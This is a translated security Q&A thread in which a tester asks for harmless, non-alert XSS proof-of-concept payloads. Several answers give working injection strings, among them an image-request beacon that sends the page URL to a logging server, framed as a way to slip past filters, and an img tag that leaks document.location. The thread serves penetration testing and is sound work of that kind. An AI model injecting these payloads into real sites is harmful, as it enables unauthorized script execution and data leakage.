¿Alguna carga de XSS no maliciosa no basada en alertas ()?

4

He estado tratando de encontrar cargas útiles XSS no malintencionadas, no basadas en alertas, de comando único, y hasta ahora no he visto ninguna. ¿Alguien sabe de alguna buena para fines de prueba? Lo que quiero decir con una sola línea es una versión no alerta o emergente de javascript:alert(1); que puede mostrar XSS reflexivo

    
pregunta Sanic Rider 22.01.2016 - 06:45
fuente

7 respuestas

10

Puedes probar console.log('XSS').

    
respondido por el Sravan 22.01.2016 - 10:16
fuente
8

Para propósitos de prueba, creo que el más útil es una solicitud HTTP. Esto permite que su servidor registre las URL que reflejaron con éxito el XSS.

(new Image()).src = "https://localhost/log_xss?from=" + window.location;

También puedes envolverlo en un script de usuario:

// ==UserScript==
// @match <all_urls> 
// @run-at document-start
// ==/UserScript==

Object.defineProperty(window, "f", {
  get: function () {
    // Your function, you can change if you want.
    (new Image()).src = "https://localhost/log_xss?from=" + window.location;
  }
});

Entonces, probar XSS es tan fácil como:

<script>f</script>
<input onfocus=f autofocus>

Hay dos ventajas:

  • Puede ayudar a evitar algunos filtros XSS. "f" no tiene caracteres especiales, por lo que es muy probable que no se filtre. Aún tendrá que escribir una carga útil completa que omita el filtro, pero puede ayudar a la detección.
  • También es más discreto ya que el sitio pentested nunca obtendrá la URL de su servidor.
respondido por el Benoit Esnard 22.01.2016 - 12:01
fuente
6

Con la manipulación de DOM se podría cambiar la página. En caso de que alguien conozca la página de destino, puede manipularse de alguna manera agradable.

Un ejemplo fácil sería:

document.body.innerHTML = 'XSS';
    
respondido por el DaniEll 22.01.2016 - 07:02
fuente
2

Por lo general, hago una búsqueda en la imagen de Google para una imagen divertida, la guardo en mi propio servidor HTTPS y luego creo una etiqueta <img /> usando la vulnerabilidad XSS.

Con un poco de imaginación, esto puede demostrar la vulnerabilidad de una manera humorística.

También puedes ver el sitio enlace para otras cargas útiles interesantes.

    
respondido por el SilverlightFox 25.01.2016 - 12:28
fuente
0

Para fines de demostración, puede hacer una redirección de ubicación de documentos a un sitio web diferente. Sería divertido inyectar el Harlem Shake js que hace que todo en la página baile.

    
respondido por el multithr3at3d 23.01.2016 - 19:51
fuente
0

Dependiendo de su audiencia, también puede inyectar algunas tonterías javascript como un salvapantallas matricial ( esto por ejemplo).

    
respondido por el SleepProgger 23.01.2016 - 20:16
fuente
0

<img src="test.com/index.php?something=document.location/>

Si se coloca en un lugar no persistente.

    
respondido por el dylan7 22.01.2016 - 18:10
fuente

Lea otras preguntas en las etiquetas